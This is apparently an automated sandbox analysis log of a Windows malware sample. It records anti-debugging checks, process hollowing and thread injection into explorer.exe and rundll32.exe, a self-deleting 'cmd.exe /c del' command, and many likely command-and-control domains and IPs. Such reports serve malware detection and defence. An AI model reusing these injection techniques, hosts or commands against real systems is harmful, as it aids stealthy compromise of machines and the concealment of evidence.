          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055A5210 mov ecx, dword ptr fs:[00000030h]3_2_055A5210
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055A5210 mov eax, dword ptr fs:[00000030h]3_2_055A5210
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055A5210 mov eax, dword ptr fs:[00000030h]3_2_055A5210
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055AAA16 mov eax, dword ptr fs:[00000030h]3_2_055AAA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055AAA16 mov eax, dword ptr fs:[00000030h]3_2_055AAA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055B8A0A mov eax, dword ptr fs:[00000030h]3_2_055B8A0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CB236 mov eax, dword ptr fs:[00000030h]3_2_055CB236
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CB236 mov eax, dword ptr fs:[00000030h]3_2_055CB236
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CB236 mov eax, dword ptr fs:[00000030h]3_2_055CB236
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CB236 mov eax, dword ptr fs:[00000030h]3_2_055CB236
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CB236 mov eax, dword ptr fs:[00000030h]3_2_055CB236
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CB236 mov eax, dword ptr fs:[00000030h]3_2_055CB236
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0566AA16 mov eax, dword ptr fs:[00000030h]3_2_0566AA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0566AA16 mov eax, dword ptr fs:[00000030h]3_2_0566AA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E4A2C mov eax, dword ptr fs:[00000030h]3_2_055E4A2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E4A2C mov eax, dword ptr fs:[00000030h]3_2_055E4A2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA229 mov eax, dword ptr fs:[00000030h]3_2_055CA229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA229 mov eax, dword ptr fs:[00000030h]3_2_055CA229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA229 mov eax, dword ptr fs:[00000030h]3_2_055CA229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA229 mov eax, dword ptr fs:[00000030h]3_2_055CA229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA229 mov eax, dword ptr fs:[00000030h]3_2_055CA229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA229 mov eax, dword ptr fs:[00000030h]3_2_055CA229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA229 mov eax, dword ptr fs:[00000030h]3_2_055CA229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA229 mov eax, dword ptr fs:[00000030h]3_2_055CA229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055CA229 mov eax, dword ptr fs:[00000030h]3_2_055CA229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05664AEF mov eax, dword ptr fs:[00000030h]3_2_05664AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05664AEF mov eax, dword ptr fs:[00000030h]3_2_05664AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05664AEF mov eax, dword ptr fs:[00000030h]3_2_05664AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05664AEF mov eax, dword ptr fs:[00000030h]3_2_05664AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05664AEF mov eax, dword ptr fs:[00000030h]3_2_05664AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05664AEF mov eax, dword ptr fs:[00000030h]3_2_05664AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05664AEF mov eax, dword ptr fs:[00000030h]3_2_05664AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05664AEF mov eax, dword ptr fs:[00000030h]3_2_05664AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05664AEF mov eax, dword ptr fs:[00000030h]3_2_05664AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05664AEF mov eax, dword ptr fs:[00000030h]3_2_05664AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05664AEF mov eax, dword ptr fs:[00000030h]3_2_05664AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05664AEF mov eax, dword ptr fs:[00000030h]3_2_05664AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05664AEF mov eax, dword ptr fs:[00000030h]3_2_05664AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_05664AEF mov eax, dword ptr fs:[00000030h]3_2_05664AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D2ACB mov eax, dword ptr fs:[00000030h]3_2_055D2ACB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055D2AE4 mov eax, dword ptr fs:[00000030h]3_2_055D2AE4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DD294 mov eax, dword ptr fs:[00000030h]3_2_055DD294
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DD294 mov eax, dword ptr fs:[00000030h]3_2_055DD294
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055BAAB0 mov eax, dword ptr fs:[00000030h]3_2_055BAAB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055BAAB0 mov eax, dword ptr fs:[00000030h]3_2_055BAAB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055DFAB0 mov eax, dword ptr fs:[00000030h]3_2_055DFAB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055A52A5 mov eax, dword ptr fs:[00000030h]3_2_055A52A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055A52A5 mov eax, dword ptr fs:[00000030h]3_2_055A52A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055A52A5 mov eax, dword ptr fs:[00000030h]3_2_055A52A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055A52A5 mov eax, dword ptr fs:[00000030h]3_2_055A52A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055A52A5 mov eax, dword ptr fs:[00000030h]3_2_055A52A5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0480849B mov eax, dword ptr fs:[00000030h]11_2_0480849B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B4496 mov eax, dword ptr fs:[00000030h]11_2_048B4496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B4496 mov eax, dword ptr fs:[00000030h]11_2_048B4496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B4496 mov eax, dword ptr fs:[00000030h]11_2_048B4496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B4496 mov eax, dword ptr fs:[00000030h]11_2_048B4496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B4496 mov eax, dword ptr fs:[00000030h]11_2_048B4496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B4496 mov eax, dword ptr fs:[00000030h]11_2_048B4496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B4496 mov eax, dword ptr fs:[00000030h]11_2_048B4496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B4496 mov eax, dword ptr fs:[00000030h]11_2_048B4496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B4496 mov eax, dword ptr fs:[00000030h]11_2_048B4496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B4496 mov eax, dword ptr fs:[00000030h]11_2_048B4496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B4496 mov eax, dword ptr fs:[00000030h]11_2_048B4496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B4496 mov eax, dword ptr fs:[00000030h]11_2_048B4496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B4496 mov eax, dword ptr fs:[00000030h]11_2_048B4496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048C8CD6 mov eax, dword ptr fs:[00000030h]11_2_048C8CD6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B14FB mov eax, dword ptr fs:[00000030h]11_2_048B14FB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04876CF0 mov eax, dword ptr fs:[00000030h]11_2_04876CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04876CF0 mov eax, dword ptr fs:[00000030h]11_2_04876CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04876CF0 mov eax, dword ptr fs:[00000030h]11_2_04876CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048C740D mov eax, dword ptr fs:[00000030h]11_2_048C740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048C740D mov eax, dword ptr fs:[00000030h]11_2_048C740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048C740D mov eax, dword ptr fs:[00000030h]11_2_048C740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B1C06 mov eax, dword ptr fs:[00000030h]11_2_048B1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B1C06 mov eax, dword ptr fs:[00000030h]11_2_048B1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B1C06 mov eax, dword ptr fs:[00000030h]11_2_048B1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B1C06 mov eax, dword ptr fs:[00000030h]11_2_048B1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B1C06 mov eax, dword ptr fs:[00000030h]11_2_048B1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B1C06 mov eax, dword ptr fs:[00000030h]11_2_048B1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B1C06 mov eax, dword ptr fs:[00000030h]11_2_048B1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B1C06 mov eax, dword ptr fs:[00000030h]11_2_048B1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B1C06 mov eax, dword ptr fs:[00000030h]11_2_048B1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B1C06 mov eax, dword ptr fs:[00000030h]11_2_048B1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B1C06 mov eax, dword ptr fs:[00000030h]11_2_048B1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B1C06 mov eax, dword ptr fs:[00000030h]11_2_048B1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B1C06 mov eax, dword ptr fs:[00000030h]11_2_048B1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B1C06 mov eax, dword ptr fs:[00000030h]11_2_048B1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04876C0A mov eax, dword ptr fs:[00000030h]11_2_04876C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04876C0A mov eax, dword ptr fs:[00000030h]11_2_04876C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04876C0A mov eax, dword ptr fs:[00000030h]11_2_04876C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04876C0A mov eax, dword ptr fs:[00000030h]11_2_04876C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0482BC2C mov eax, dword ptr fs:[00000030h]11_2_0482BC2C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0482A44B mov eax, dword ptr fs:[00000030h]11_2_0482A44B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0488C450 mov eax, dword ptr fs:[00000030h]11_2_0488C450
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0488C450 mov eax, dword ptr fs:[00000030h]11_2_0488C450
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0481746D mov eax, dword ptr fs:[00000030h]11_2_0481746D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0481B477 mov eax, dword ptr fs:[00000030h]11_2_0481B477
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0481B477 mov eax, dword ptr fs:[00000030h]11_2_0481B477
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0481B477 mov eax, dword ptr fs:[00000030h]11_2_0481B477
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0481B477 mov eax, dword ptr fs:[00000030h]11_2_0481B477
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0481B477 mov eax, dword ptr fs:[00000030h]11_2_0481B477
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0481B477 mov eax, dword ptr fs:[00000030h]11_2_0481B477
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0481B477 mov eax, dword ptr fs:[00000030h]11_2_0481B477
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0481B477 mov eax, dword ptr fs:[00000030h]11_2_0481B477
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0481B477 mov eax, dword ptr fs:[00000030h]11_2_0481B477
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0481B477 mov eax, dword ptr fs:[00000030h]11_2_0481B477
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0481B477 mov eax, dword ptr fs:[00000030h]11_2_0481B477
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0481B477 mov eax, dword ptr fs:[00000030h]11_2_0481B477
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0482AC7B mov eax, dword ptr fs:[00000030h]11_2_0482AC7B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0482AC7B mov eax, dword ptr fs:[00000030h]11_2_0482AC7B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0482AC7B mov eax, dword ptr fs:[00000030h]11_2_0482AC7B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0482AC7B mov eax, dword ptr fs:[00000030h]11_2_0482AC7B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0482AC7B mov eax, dword ptr fs:[00000030h]11_2_0482AC7B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0482AC7B mov eax, dword ptr fs:[00000030h]11_2_0482AC7B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0482AC7B mov eax, dword ptr fs:[00000030h]11_2_0482AC7B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0482AC7B mov eax, dword ptr fs:[00000030h]11_2_0482AC7B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0482AC7B mov eax, dword ptr fs:[00000030h]11_2_0482AC7B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0482AC7B mov eax, dword ptr fs:[00000030h]11_2_0482AC7B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0482AC7B mov eax, dword ptr fs:[00000030h]11_2_0482AC7B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04822581 mov eax, dword ptr fs:[00000030h]11_2_04822581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04822581 mov eax, dword ptr fs:[00000030h]11_2_04822581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04822581 mov eax, dword ptr fs:[00000030h]11_2_04822581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04822581 mov eax, dword ptr fs:[00000030h]11_2_04822581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B2D82 mov eax, dword ptr fs:[00000030h]11_2_048B2D82
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B2D82 mov eax, dword ptr fs:[00000030h]11_2_048B2D82
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B2D82 mov eax, dword ptr fs:[00000030h]11_2_048B2D82
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B2D82 mov eax, dword ptr fs:[00000030h]11_2_048B2D82
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B2D82 mov eax, dword ptr fs:[00000030h]11_2_048B2D82
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B2D82 mov eax, dword ptr fs:[00000030h]11_2_048B2D82
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B2D82 mov eax, dword ptr fs:[00000030h]11_2_048B2D82
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0482FD9B mov eax, dword ptr fs:[00000030h]11_2_0482FD9B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0482FD9B mov eax, dword ptr fs:[00000030h]11_2_0482FD9B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048C05AC mov eax, dword ptr fs:[00000030h]11_2_048C05AC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048C05AC mov eax, dword ptr fs:[00000030h]11_2_048C05AC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048235A1 mov eax, dword ptr fs:[00000030h]11_2_048235A1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04821DB5 mov eax, dword ptr fs:[00000030h]11_2_04821DB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04821DB5 mov eax, dword ptr fs:[00000030h]11_2_04821DB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04821DB5 mov eax, dword ptr fs:[00000030h]11_2_04821DB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04876DC9 mov eax, dword ptr fs:[00000030h]11_2_04876DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04876DC9 mov eax, dword ptr fs:[00000030h]11_2_04876DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04876DC9 mov eax, dword ptr fs:[00000030h]11_2_04876DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04876DC9 mov ecx, dword ptr fs:[00000030h]11_2_04876DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04876DC9 mov eax, dword ptr fs:[00000030h]11_2_04876DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04876DC9 mov eax, dword ptr fs:[00000030h]11_2_04876DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_047FAD30 mov eax, dword ptr fs:[00000030h]11_2_047FAD30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0480D5E0 mov eax, dword ptr fs:[00000030h]11_2_0480D5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0480D5E0 mov eax, dword ptr fs:[00000030h]11_2_0480D5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048BFDE2 mov eax, dword ptr fs:[00000030h]11_2_048BFDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048BFDE2 mov eax, dword ptr fs:[00000030h]11_2_048BFDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048BFDE2 mov eax, dword ptr fs:[00000030h]11_2_048BFDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048BFDE2 mov eax, dword ptr fs:[00000030h]11_2_048BFDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048A8DF1 mov eax, dword ptr fs:[00000030h]11_2_048A8DF1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0487A537 mov eax, dword ptr fs:[00000030h]11_2_0487A537
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048BE539 mov eax, dword ptr fs:[00000030h]11_2_048BE539
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04803D34 mov eax, dword ptr fs:[00000030h]11_2_04803D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04803D34 mov eax, dword ptr fs:[00000030h]11_2_04803D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04803D34 mov eax, dword ptr fs:[00000030h]11_2_04803D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04803D34 mov eax, dword ptr fs:[00000030h]11_2_04803D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00409B30 LdrLoadDll,3_2_00409B30
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 185.68.16.179 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.tubesing.com
          Source: C:\Windows\explorer.exeDomain query: www.travisjbogard.com
          Source: C:\Windows\explorer.exeNetwork Connect: 37.187.131.150 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 15.197.142.173 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.tahnforest.com
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.253.231 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.edisson-bd.com
          Source: C:\Windows\explorer.exeNetwork Connect: 35.201.101.222 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.ageofcryptos.com
          Source: C:\Windows\explorer.exeNetwork Connect: 203.170.80.250 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.salahov.info
          Source: C:\Windows\explorer.exeNetwork Connect: 185.129.100.127 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.garglimited.com
          Source: C:\Windows\explorer.exeDomain query: www.exceedrigging.online
          Source: C:\Windows\explorer.exeNetwork Connect: 62.149.128.40 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.christineenergy.com
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 23.80.123.107 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.tellgalpy.com
          Source: C:\Windows\explorer.exeNetwork Connect: 43.240.146.175 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.american-atlantic.net
          Source: C:\Windows\explorer.exeDomain query: www.mentalnayaarifmetika.online
          Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.mftie.com
          Source: C:\Windows\explorer.exeDomain query: www.14offresimportantes.com
          Source: C:\Windows\explorer.exeDomain query: www.nagpurmandarin.com
          Source: C:\Windows\explorer.exeDomain query: www.engroconnect.net
          Source: C:\Windows\explorer.exeDomain query: www.muktobangla.xyz
          Source: C:\Windows\explorer.exeDomain query: www.ccav11.xyz
          Source: C:\Windows\explorer.exeDomain query: www.myamazonloan.net
          Source: C:\Windows\explorer.exeDomain query: www.skb-cabinet.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.demetbatmaz.com
          Sample uses process hollowing technique
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: CE0000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 401000Jump to behavior
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 4D8F008Jump to behavior
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 protect: page execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread register set: target process: 684Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 684Jump to behavior
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"Jump to behavior
          Source: explorer.exe, 00000004.00000000.543688861.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.465284261.0000000006100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.476319624.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.475659324.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.543688861.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.476319624.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.543688861.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.476319624.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.461391564.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: YProgram Managerf
